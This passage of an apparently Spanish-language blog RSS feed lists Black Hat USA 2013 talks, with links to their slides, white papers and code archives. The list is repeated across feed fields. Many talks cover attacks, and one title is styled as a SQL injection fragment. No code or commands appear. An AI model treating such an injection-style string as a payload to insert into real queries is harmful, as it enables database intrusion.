href="https://media.blackhat.com/us-13/US-13-Haruyama-Malicous-File-For-Exploiting-Forensic-Software-Slides.pdf"&gt;US-13-Haruyama-Malicous-File-For-Exploiting-Forensic-Software-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Mobile Malware: Why the traditional AV paradigm is doomed and how to use physics to detect undesirable routines &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Stewart-Mobile-Malware-Why-the-Traditional-AV-Paradigm-is-Doomed-WP.pdf"&gt;US-13-Stewart-Mobile-Malware-Why-the-Traditional-AV-Paradigm-is-Doomed-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Stewart-Mobile-Malware-Why-the-Traditional-AV-Paradigm-is-Doomed-Slides.pdf"&gt;US-13-Stewart-Mobile-Malware-Why-the-Traditional-AV-Paradigm-is-Doomed-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;New Trends in FastFlux Networks &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Xu-New-Trends-in-FastFlux-Networks-WP.pdf"&gt;US-13-Xu-New-Trends-in-FastFlux-Networks-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Xu-New-Trends-in-FastFlux-Networks-Slides.pdf"&gt;US-13-Xu-New-Trends-in-FastFlux-Networks-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;OPSEC failures of spies &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Cole-OPSEC-Failures-of-Spies-Slides.pdf"&gt;US-13-Cole-OPSEC-Failures-of-Spies-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Password Hashing: the Future is Now &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Aumasson-Password-Hashing-the-Future-is-Now-WP.pdf"&gt;US-13-Aumasson-Password-Hashing-the-Future-is-Now-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Aumasson-Password-Hashing-the-Future-is-Now-Slides.pdf"&gt;US-13-Aumasson-Password-Hashing-the-Future-is-Now-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Shattering Illusions in Lock-Free Worlds: Compiler/Hardware Behaviors in OSes and VMs &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/us-13-Blanchou-Shattering-Illusions-in-Lock-Free-Worlds.pdf"&gt;us-13-Blanchou-Shattering-Illusions-in-Lock-Free-Worlds.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;TOR… ALL-THE-THINGS! &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Geffner-Tor...-All-The-Things-WP.pdf"&gt;US-13-Geffner-Tor…-All-The-Things-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Geffner-Tor...-All-The-Things-Slides.pdf"&gt;US-13-Geffner-Tor…-All-The-Things-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Truncating TLS Connections to Violate Beliefs in Web Applications &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Smyth-Truncating-TLS-Connections-to-Violate-Beliefs-in-Web-Applications-WP.pdf"&gt;US-13-Smyth-Truncating-TLS-Connections-to-Violate-Beliefs-in-Web-Applications-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Smyth-Truncating-TLS-Connections-to-Violate-Beliefs-in-Web-Applications-Slides.pdf"&gt;US-13-Smyth-Truncating-TLS-Connections-to-Violate-Beliefs-in-Web-Applications-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;The Web IS Vulnerable: XSS Defense on the BattleFront &lt;/span&gt;&lt;ul&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Wroblewski-The-Web-IS-Vulnerable-XSS-Defense-on-the-Battle-Front-Slides.pdf"&gt;US-13-Wroblewski-The-Web-IS-Vulnerable-XSS-Defense-on-the-Battle-Front-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Wroblewski-The-Web-IS-Vulnerable-XSS-Defense-on-the-BattleFront-Code.zip"&gt;US-13-Wroblewski-The-Web-IS-Vulnerable-XSS-Defense-on-the-BattleFront-Code.zip&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;hr /&gt;Fuente - &lt;b&gt;&lt;a href="http://www.cyberhades.com/2013/08/02/presentaciones-de-blackhat-usa-2013/" target="_blank"&gt;Cyberhades&lt;/a&gt;&lt;/b&gt;&lt;/ul&gt;</description><link>http://kode-labs.blogspot.com/2013/08/presentaciones-de-blackhat-usa-2013.html</link><author>noreply@blogger.com (Kodeinfect)</author><enclosure length="16105242" type="application/pdf" url="https://media.blackhat.com/us-13/us-13-Alexander-keynote.pdf"/><itunes:explicit/><itunes:subtitle>Ya están disponibles las diapositivas de las presentaciones de la BlackHat USA de esta año, celebrada en el Caesars Palace en Las Vegas entre el 27 de julio y el 1 de agosto. En esta edición parece que la audiencia ha estado dividida por toda la polémica relacionada con las filtraciones de la NSA y su programa Prism. En especial con la presentación de apertura, de la cual también puedes acceder al vídeo, dada por el General Keith B. Alexander, director de la agencia de seguridad nacional (NSA). Day One Keynote July 31 us-13-Alexander-keynote.pdfus-13-Alexander-keynote.m4vA Practical Attack against MDM Solutions US-13-Brodie-A-Practical-Attack-against-MDM-Solutions-WP.pdfUS-13-Brodie-A-Practical-Attack-against-MDM-Solutions-Slides.pdfAbove My Pay Grade: Cyber Response at the National Level US-13-Healey-Above-My-Pay-Grade-WP.pdfUS-13-Healey-Above-My-Pay-Grade-Slides.pdfAndroid: one root to own them all US-13-Forristal-Android-One-Root-to-Own-Them-All-Slides.pdfBinaryPig – Scalable Malware Analytics in Hadoop US-13-Hanif-Binarypig-Scalable-Malware-Analytics-in-Hadoop-WP.pdfUS-13-Hanif-Binarypig-Scalable-Malware-Analytics-in-Hadoop-Slides.pdfUS-13-Hanif-Binarypig-Scalable-Malware-Analytics-in-Hadoop-Code.tar.gzBIOS Security US-13-Butterworth-BIOS-Security-WP.pdfUS-13-Butterworth-BIOS-Security-Slides.pdfUS-13-Butterworth-BIOS-Security-Code.zipBlack-Box Assessment of Pseudorandom Algorithms US-13-Soeder-Black-Box-Assessment-of-Pseudorandom-Algorithms-WP.pdfUS-13-Soeder-Black-Box-Assessment-of-Pseudorandom-Algorithms-Slides.pdfUS-13-Soeder-Black-Box-Assessment-of-Pseudorandom-Algorithms-Code.zipBugalyze.com – Detecting Bugs Using Decompilation and Data Flow Analysis US-13-Cesare-Bugalyze.com-Detecting-Bugs-Using-Decompilation-WP.pdfUS-13-Cesare-Bugalyze.com-Detecting-Bugs-Using-Decompilation-Slides.pdfBuying into the Bias: Why Vulnerability Statistics Suck US-13-Martin-Buying-Into-The-Bias-Why-Vulnerability-Statistics-Suck-WP.pdfUS-13-Martin-Buying-Into-The-Bias-Why-Vulnerability-Statistics-Suck-Slides.pdfCombating the Insider Threat at the FBI: Real World Lessons Learned US-13-Reidy-Combating-the-Insider-Threat-At-The-FBI-Slides.pdfCompromising Industrial Facilities From 40 Miles Away US-13-Apa-Compromising-Industrial-Facilities-From-40-Miles-Away-WP.pdfUS-13-Apa-Compromising-Industrial-Facilities-From-40-Miles-Away-Slides.pdfCreepyDOL: Cheap, Distributed Stalking US-13-OConnor-CreepyDOL-Cheap-Distributed-Stalking-WP.pdfUS-13-OConnor-CreepyDOL-Cheap-Distributed-Stalking-Slides.pdfDefending Networks with Incomplete Information: A Machine Learning Approach US-13-Pinto-Defending-Networks-with-Incomplete-Information-A-Machine-Learning-Approach-WP.pdfUS-13-Pinto-Defending-Networks-with-Incomplete-Information-A-Machine-Learning-Approach-Slides.pdfEnd-to-End Analysis of a Domain Generating Algorithm Malware Family US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdfUS-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-Slides.pdfEnergy Fraud and Orchestrated Blackouts: Issues with Wireless Metering Protocols (wM-Bus) US-13-Brunschwiler-Energy-Fraud-and-Orchestrated-Blackouts-Issues-with-Wireless-Metering-Protocols-WP.pdfUS-13-Brunschwiler-Energy-Fraud-and-Orchestrated-Blackouts-Issues-with-Wireless-Metering-Protocols-Slides.pdfExploiting Network Surveillance Cameras Like a Hollywood Hacker US-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-WP.pdfUS-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-Slides.pdfEvading deep inspection for fun and shell US-13-Opi-Evading-Deep-Inspection-for-Fun-and-Shell-WP.pdfUS-13-Opi-Evading-Deep-Inspection-for-Fun-and-Shell-Slides.pdfUS-13-Opi-Evading-Deep-Inspection-for-Fun-and-Shell-Code.zipThe Factoring Dead: Preparing for the Cryptopocalypse us-13-Stamos-The-Factoring-Dead.pdfFully Arbitrary 802.3 Packet Injection: Maximizing the Ethernet Attack Surface US-13-Barisani-Fully-Arbitrary-802-3-Packet-Injection-WP.pdfUS-13-Barisani-Fully-Arbitrary-802-3-Packet-Injection-Slides.pdfFunderbolt: Adventures in Thunderbolt DMA Attacks US-13-Sevinsky-Funderbolt-Adventures-in-Thunderbolt-DMA-Attacks-Slides.pdfHacking like in the Movies: Visualizing Page Tables for Local Exploitation US-13-Wicherski-Hacking-like-in-the-Movies-Visualizing-Page-Tables-WP.pdfUS-13-Wicherski-Hacking-like-in-the-Movies-Visualizing-Page-Tables-Slides.pdfUS-13-Wicherski-Hacking-like-in-the-Movies-Visualizing-Page-Tables-Pictures.zipHacking, Surveilling, and Deceiving victims on Smart TV US-13-Lee-Hacking-Surveilling-and-Deceiving-Victims-on-Smart-TV-Slides.pdfHome Invasion v2.0 – Attacking Network-Controlled Hardware US-13-Crowley-Home-Invasion-2-0-WP.pdfUS-13-Crowley-Home-Invasion-2-0-Slides.pdfUS-13-Crowley-HomeInvasion2-0-Source-Code.zipHot Knives Through Butter: Bypassing Automated Analysis Systems US-13-Singh-Hot-Knives-Through-Butter-Evading-File-based-Sandboxes-WP.pdfUS-13-Singh-Hot-Knives-Through-Butter-Evading-File-Based-Sandboxes-Slides.pdfHOW CVSS is DOSsing YOUR PATCHING POLICY (and wasting your money) US-13-Allodi-HOW-CVSS-is-DOSsing-Your-Patching-Policy-WP.pdfUS-13-Allodi-HOW-CVSS-is-DOSsing-Your-Patching-Policy-Slides.pdfHow to Build a SpyPhone US-13-McNamee-How-To-Build-a-SpyPhone-WP.pdfUS-13-McNamee-How-To-Build-a-SpyPhone-Slides.pdfHow to Grow a TREE (Taint-enabled Reverse Engineering Environment) From CBASS (Cross-platform Binary Automated Symbolic-execution System) US-13-Li-How-to-Grow-a-TREE-Code.zipHunting the Shadows: In Depth Analysis of Escalated APT Attacks US-13-Yarochkin-In-Depth-Analysis-of-Escalated-APT-Attacks-WP.pdfUS-13-Yarochkin-In-Depth-Analysis-of-Escalated-APT-Attacks-Slides.pdfIs that a government in your network or are you just happy to see me? US-13-Fiterman-Is-that-a-Government-in-Your-Network-Slides.pdfJava Every-Days: Exploiting Software Running on 3 Billion Devices US-13-Gorenc-Java-Every-Days-Exploiting-Software-Running-on-3-Billion-Devices-WP.pdfUS-13-Gorenc-Java-Every-Days-Exploiting-Software-Running-on-3-Billion-Devices-Slides.pdfJavascript Static Security Analysis made easy with JSPrime US-13-Patnaik-Javascript-Static-Security-Analysis-made-Easy-with-JSPrime-WP.pdfUS-13-Patnaik-Javascript-Static-Security-Analysis-made-easy-with-JSPrime-Slides.pdfJust-In-Time Code Reuse: The more things change, the more they stay the same US-13-Snow-Just-In-Time-Code-Reuse-Slides.pdfLegal Aspects of Full Spectrum Computer Network (Active) Defense US-13-Clark-Legal-Aspects-of-Full-Spectrum-Computer-Network-Active-Defense-Slides.pdfMactans: Injecting Malware into iOS Devices via Malicious Chargers US-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-WP.pdfUS-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-Slides.pdfMainframes: The Past Will Come Back to Haunt You US-13-Young-Mainframes-The-Past-Will-Come-Back-to-Haunt-You-WP.pdfUS-13-Young-Mainframes-The-Past-Will-Come-Back-to-Haunt-You-Slides.pdfMaltego Tungsten as a collaborative attack platform US-13-Temmingh-Maltego-Tungsten-as-a-Collaborative-Attack-Platform-WP.pdfUS-13-Temmingh-Maltego-Tungsten-as-a-Collaborative-Attack-Platform-Slides.pdfMultiplexed Wired Attack Surfaces US-13-Ossmann-Multiplexed-Wired-Attack-Surfaces-WP.pdfOptiROP: hunting for ROP gadgets in style US-13-Quynh-OptiROP-Hunting-for-ROP-Gadgets-in-Style-WP.pdfOut of Control: Demonstrating SCADA device exploitation US-13-Forner-Out-of-Control-Demonstrating-SCADA-WP.pdfUS-13-Forner-Out-of-Control-Demonstrating-SCADA-Slides.pdfOwning the Routing Table – Part II US-13-Nakibly-Owning-the-Routing-Table-Part-II-WP.pdfUS-13-Nakibly-Owning-the-Routing-Table-Part-II-Slides.pdfPass-The-Hash 2: The Admin’s Revenge US-13-Duckwall-Pass-the-Hash-WP.pdfUS-13-Duckwall-Pass-the-Hash-Slides.pdfUS-13-Duckwall-Pass-The-Hash-2-The-Admins-Revenge-Code.zipPixel Perfect Timing Attacks with HTML5 US-13-Stone-Pixel-Perfect-Timing-Attacks-with-HTML5-WP.pdfPost Exploitation Operations with Cloud Synchronization Services US-13-Williams-Post-Exploitation-Operations-with-Cloud-Synchronization-Services-WP.pdfUS-13-Williams-Post-Exploitation-Operations-with-Cloud-Synchronization-Services-Slides.pdfPower Analysis Attacks for Cheapskates US-13-OFlynn-Power-Analysis-Attacks-for-Cheapskates-WP.pdfUS-13-OFlynn-Power-Analysis-Attacks-for-Cheapskates-Slides.pdfPredicting Susceptibility to Social Bots on Twitter US-13-Sumner-Predicting-Susceptibility-to-Social-Bots-on-Twitter-Slides.pdfPress ROOT to continue: Detecting OSX and Windows bootkits with RDFU US-13-Vuksan-Press-ROOT-to-Continue-Detecting-MacOS-and-Windows-Bootkits-with-RDFU-WP.pdfUS-13-Vuksan-Press-ROOT-to-Continue-Detecting-MacOS-and-Windows-Bootkits-with-RDFU-Slides.pdfRevealing Embedded Fingerprints: Deriving intelligence from USB stack interactions US-13-Davis-Deriving-Intelligence-From-USB-Stack-Interactions-Slides.pdfRFID Hacking: Live Free or RFID Hard US-13-Brown-RFID-Hacking-Live-Free-or-RFID-Hard-Slides.pdfUS-13-Brown-RFID-Hacking-Live-Free-or-RFID-Hard-Code.zipThe SCADA That Didn’t Cry Wolf- Who’s Really Attacking Your ICS Devices- Part Deux! US-13-Wilhoit-The-SCADA-That-Didnt-Cry-Wolf-Whos-Really-Attacking-Your-ICS-Devices-Slides.pdfSmashing The Font Scaler Engine in Windows Kernel US-13-Chan-Smashing-The-Font-Scaler-Engine-in-Windows-Kernel-WP.pdfUS-13-Chan-Smashing-The-Font-Scaler-Engine-in-Windows-Kernel-Slides.pdfSSL, gone in 30 seconds – a BREACH beyond CRIME US-13-Prado-SSL-Gone-in-30-seconds-A-BREACH-beyond-CRIME-WP.pdfUS-13-Prado-SSL-Gone-in-30-seconds-A-BREACH-beyond-CRIME-Slides.pdfTLS ‘secrets’ US-13-Daigniere-TLS-Secrets-WP.pdfUS-13-Daigniere-TLS-Secrets-Slides.pdfUART THOU MAD? US-13-Kohlenberg-UART-Thou-Mad-WP.pdfUS-13-Kohlenberg-UART-Thou-Mad-Slides.pdfUniversal DDoS Mitigation Bypass US-13-Lee-Universal-DDoS-Mitigation-Bypass-WP.pdfUS-13-Lee-Universal-DDoS-Mitigation-Bypass-Slides.pdfUS-13-Lee-Universal-DDoS-Mitigation-Bypass-Code.zipUSING ONLINE ACTIVITY AS DIGITAL FINGERPRINTS TO CREATE A BETTER SPEAR PHISHER US-13-Espinhara-Using-Online-Activity-As-Digital-Fingerprints-WP.pdfUS-13-Espinhara-Using-Online-Activity-As-Digital-Fingerprints-Slides.pdfVirtual Deobfuscator – a DARPA Cyber Fast Track funded effort US-13-Raber-Virtual-Deobfuscator-A-DARPA-Cyber-Fast-Track-Funded-Effort-WP.pdfUS-13-Raber-Virtual-Deobfuscator-A-DARPA-Cyber-Fast-Track-Funded-Effort-Slides.pdfUS-13-Raber-Virtual-Deobfuscator-A-DARPA-Cyber-Fast-Track-Funded-Effort-Code.zipWhat’s on the Wire? Physical Layer Tapping with Project Daisho US-13-Spill-Whats-on-the-Wire-WP.pdfUS-13-Spill-Whats-on-the-Wire-Slides.pdfWith BIGDATA comes BIG responsibility: Practical exploiting of MDX injections US-13-Chastuhin-With-BIGDATA-comes-BIG-responsibility-WP.pdfUS-13-Chastuhin-With-BIGDATA-comes-BIG-responsibility-Slides.pdf‘) UNION SELECT `This_Talk` AS (‘New Optimization and Obfuscation Techniques’) US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdfUS-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdfEmbedded Devices Security and Firmware Reverse Engineering US-13-Zaddach-Workshop-on-Embedded-Devices-Security-and-Firmware-Reverse-Engineering-WP.pdfUS-13-Zaddach-Workshop-on-Embedded-Devices-Security-and-Firmware-Reverse-Engineering-Slides.pdfJTAGulator: Assisted discovery of on-chip debug interfaces US-13-Grand-JTAGulator-Assisted-Discovery-of-On-Chip-Debug-Interfaces-Slides.pdfUS-13-Grand-JTAGulator-Assisted-Discovery-of-On-Chip-Debug-Interfaces-Code.zipMethodologies for Hacking Embedded Security Appliances US-13-Bathurst-Methodologies-for-Hacking-Embdded-Security-Appliances-Slides.pdfMo Malware Mo Problems – Cuckoo Sandbox to the rescue US-13-Bremer-Mo-Malware-Mo-Problems-Cuckoo-Sandbox-WP.pdfUS-13-Bremer-Mo-Malware-Mo-Problems-Cuckoo-Sandbox-Slides.pdfPDF Attack: A Journey from the Exploit Kit to the shellcode US-13-Esparza-PDF-Attack-A-journey-from-the-Exploit-Kit-Slides.pdfUS-13-Esparza-PDF-Attack-A-journey-from-the-Exploit-Kit-Slides-Source.zipPractical Pentesting of ERPs and Business Applications US-13-Polyakov-Practical-Pentesting-of-ERPs-and-Business-Applications-WP.pdfUS-13-Polyakov-Practical-Pentesting-of-ERPs-and-Business-Applications-Slides.pdfAbusing Web APIs Through Scripted Android Applications US-13-Peck-Abusing-Web-APIs-Through-Scripted-Android-Applications-WP.pdfUS-13-Peck-Abusing-Web-APIs-Through-Scripted-Android-Applications-Slides.pdfBeyond the Application: Cellular Privacy Regulation Space US-13-Dudley-Beyond-the-Application-Cellular-Privacy-Regulatory-Space-WP.pdfUS-13-Dudley-Beyond-the-Application-Cellular-Privacy-Regulatory-Space-Slides.pdfClickjacking Revisited: A Perceptual View of UI Security US-13-Akhawe-Clickjacking-Revisited-A-Perceptual-View-of-UI-Security-Slides.pdfCMX: IEEE Clean File Metadata Exchange US-13-Kennedy-CMX-IEEE-Clean-File-Metadata-Exchange-WP.pdfCrowdSource: An Open Source, Crowd Trained Machine Learning Model for Malware Capability Detection US-13-Saxe-CrowdSource-An-Open-Source-Crowd-Trained-Machine-Learning-Model-Slides.pdfDenial of Service as a Service – asymmetrical warfare at its finest US-13-Masse-Denial-of-Service-as-a-Service-Slides.pdfDenying service to DDOS protection services US-13-Nixon-Denying-Service-to-DDOS-Protection-Services-WP.pdfUS-13-Nixon-Denying-Service-to-DDOS-Protection-Services-Slides.pdfLTE BOOMS WITH VULNERABILITIES US-13-Gupta-LTE-Booms-withVulnerabilities-WP.pdfMalicious File for Exploiting Forensic Software US-13-Haruyama-Malicous-File-For-Exploiting-Forensic-Software-Slides.pdfMobile Malware: Why the traditional AV paradigm is doomed and how to use physics to detect undesirable routines US-13-Stewart-Mobile-Malware-Why-the-Traditional-AV-Paradigm-is-Doomed-WP.pdfUS-13-Stewart-Mobile-Malware-Why-the-Traditional-AV-Paradigm-is-Doomed-Slides.pdfNew Trends in FastFlux Networks US-13-Xu-New-Trends-in-FastFlux-Networks-WP.pdfUS-13-Xu-New-Trends-in-FastFlux-Networks-Slides.pdfOPSEC failures of spies US-13-Cole-OPSEC-Failures-of-Spies-Slides.pdfPassword Hashing: the Future is Now US-13-Aumasson-Password-Hashing-the-Future-is-Now-WP.pdfUS-13-Aumasson-Password-Hashing-the-Future-is-Now-Slides.pdfShattering Illusions in Lock-Free Worlds: Compiler/Hardware Behaviors in OSes and VMs us-13-Blanchou-Shattering-Illusions-in-Lock-Free-Worlds.pdfTOR… ALL-THE-THINGS! US-13-Geffner-Tor…-All-The-Things-WP.pdfUS-13-Geffner-Tor…-All-The-Things-Slides.pdfTruncating TLS Connections to Violate Beliefs in Web Applications US-13-Smyth-Truncating-TLS-Connections-to-Violate-Beliefs-in-Web-Applications-WP.pdfUS-13-Smyth-Truncating-TLS-Connections-to-Violate-Beliefs-in-Web-Applications-Slides.pdfThe Web IS Vulnerable: XSS Defense on the BattleFront US-13-Wroblewski-The-Web-IS-Vulnerable-XSS-Defense-on-the-Battle-Front-Slides.pdfUS-13-Wroblewski-The-Web-IS-Vulnerable-XSS-Defense-on-the-BattleFront-Code.zipFuente - Cyberhades</itunes:subtitle><itunes:author>noreply@blogger.com (Kodeinfect)</itunes:author><itunes:summary>Ya están disponibles las diapositivas de las presentaciones de la BlackHat USA de esta año, celebrada en el Caesars Palace en Las Vegas entre el 27 de julio y el 1 de agosto. En esta edición parece que la audiencia ha estado dividida por toda la polémica relacionada con las filtraciones de la NSA y su programa Prism. En especial con la presentación de apertura, de la cual también puedes acceder al vídeo, dada por el General Keith B. Alexander, director de la agencia de seguridad nacional (NSA). Day One Keynote July 31 us-13-Alexander-keynote.pdfus-13-Alexander-keynote.m4vA Practical Attack against MDM Solutions US-13-Brodie-A-Practical-Attack-against-MDM-Solutions-WP.pdfUS-13-Brodie-A-Practical-Attack-against-MDM-Solutions-Slides.pdfAbove My Pay Grade: Cyber Response at the National Level US-13-Healey-Above-My-Pay-Grade-WP.pdfUS-13-Healey-Above-My-Pay-Grade-Slides.pdfAndroid: one root to own them all US-13-Forristal-Android-One-Root-to-Own-Them-All-Slides.pdfBinaryPig – Scalable Malware Analytics in Hadoop US-13-Hanif-Binarypig-Scalable-Malware-Analytics-in-Hadoop-WP.pdfUS-13-Hanif-Binarypig-Scalable-Malware-Analytics-in-Hadoop-Slides.pdfUS-13-Hanif-Binarypig-Scalable-Malware-Analytics-in-Hadoop-Code.tar.gzBIOS Security US-13-Butterworth-BIOS-Security-WP.pdfUS-13-Butterworth-BIOS-Security-Slides.pdfUS-13-Butterworth-BIOS-Security-Code.zipBlack-Box Assessment of Pseudorandom Algorithms US-13-Soeder-Black-Box-Assessment-of-Pseudorandom-Algorithms-WP.pdfUS-13-Soeder-Black-Box-Assessment-of-Pseudorandom-Algorithms-Slides.pdfUS-13-Soeder-Black-Box-Assessment-of-Pseudorandom-Algorithms-Code.zipBugalyze.com – Detecting Bugs Using Decompilation and Data Flow Analysis US-13-Cesare-Bugalyze.com-Detecting-Bugs-Using-Decompilation-WP.pdfUS-13-Cesare-Bugalyze.com-Detecting-Bugs-Using-Decompilation-Slides.pdfBuying into the Bias: Why Vulnerability Statistics Suck US-13-Martin-Buying-Into-The-Bias-Why-Vulnerability-Statistics-Suck-WP.pdfUS-13-Martin-Buying-Into-The-Bias-Why-Vulnerability-Statistics-Suck-Slides.pdfCombating the Insider Threat at the FBI: Real World Lessons Learned US-13-Reidy-Combating-the-Insider-Threat-At-The-FBI-Slides.pdfCompromising Industrial Facilities From 40 Miles Away US-13-Apa-Compromising-Industrial-Facilities-From-40-Miles-Away-WP.pdfUS-13-Apa-Compromising-Industrial-Facilities-From-40-Miles-Away-Slides.pdfCreepyDOL: Cheap, Distributed Stalking US-13-OConnor-CreepyDOL-Cheap-Distributed-Stalking-WP.pdfUS-13-OConnor-CreepyDOL-Cheap-Distributed-Stalking-Slides.pdfDefending Networks with Incomplete Information: A Machine Learning Approach US-13-Pinto-Defending-Networks-with-Incomplete-Information-A-Machine-Learning-Approach-WP.pdfUS-13-Pinto-Defending-Networks-with-Incomplete-Information-A-Machine-Learning-Approach-Slides.pdfEnd-to-End Analysis of a Domain Generating Algorithm Malware Family US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdfUS-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-Slides.pdfEnergy Fraud and Orchestrated Blackouts: Issues with Wireless Metering Protocols (wM-Bus) US-13-Brunschwiler-Energy-Fraud-and-Orchestrated-Blackouts-Issues-with-Wireless-Metering-Protocols-WP.pdfUS-13-Brunschwiler-Energy-Fraud-and-Orchestrated-Blackouts-Issues-with-Wireless-Metering-Protocols-Slides.pdfExploiting Network Surveillance Cameras Like a Hollywood Hacker US-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-WP.pdfUS-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-Slides.pdfEvading deep inspection for fun and shell US-13-Opi-Evading-Deep-Inspection-for-Fun-and-Shell-WP.pdfUS-13-Opi-Evading-Deep-Inspection-for-Fun-and-Shell-Slides.pdfUS-13-Opi-Evading-Deep-Inspection-for-Fun-and-Shell-Code.zipThe Factoring Dead: Preparing for the Cryptopocalypse us-13-Stamos-The-Factoring-Dead.pdfFully Arbitrary 802.3 Packet Injection: Maximizing the Ethernet Attack Surface US-13-Barisani-Fully-Arbitrary-802-3-Packet-Injection-WP.pdfUS-13-Barisani-Fully-Arbitrary-802-3-Packet-Injection-Slides.pdfFunderbolt: Adventures in Thunderbolt DMA Attacks US-13-Sevinsky-Funderbolt-Adventures-in-Thunderbolt-DMA-Attacks-Slides.pdfHacking like in the Movies: Visualizing Page Tables for Local Exploitation US-13-Wicherski-Hacking-like-in-the-Movies-Visualizing-Page-Tables-WP.pdfUS-13-Wicherski-Hacking-like-in-the-Movies-Visualizing-Page-Tables-Slides.pdfUS-13-Wicherski-Hacking-like-in-the-Movies-Visualizing-Page-Tables-Pictures.zipHacking, Surveilling, and Deceiving victims on Smart TV US-13-Lee-Hacking-Surveilling-and-Deceiving-Victims-on-Smart-TV-Slides.pdfHome Invasion v2.0 – Attacking Network-Controlled Hardware US-13-Crowley-Home-Invasion-2-0-WP.pdfUS-13-Crowley-Home-Invasion-2-0-Slides.pdfUS-13-Crowley-HomeInvasion2-0-Source-Code.zipHot Knives Through Butter: Bypassing Automated Analysis Systems US-13-Singh-Hot-Knives-Through-Butter-Evading-File-based-Sandboxes-WP.pdfUS-13-Singh-Hot-Knives-Through-Butter-Evading-File-Based-Sandboxes-Slides.pdfHOW CVSS is DOSsing YOUR PATCHING POLICY (and wasting your money) US-13-Allodi-HOW-CVSS-is-DOSsing-Your-Patching-Policy-WP.pdfUS-13-Allodi-HOW-CVSS-is-DOSsing-Your-Patching-Policy-Slides.pdfHow to Build a SpyPhone 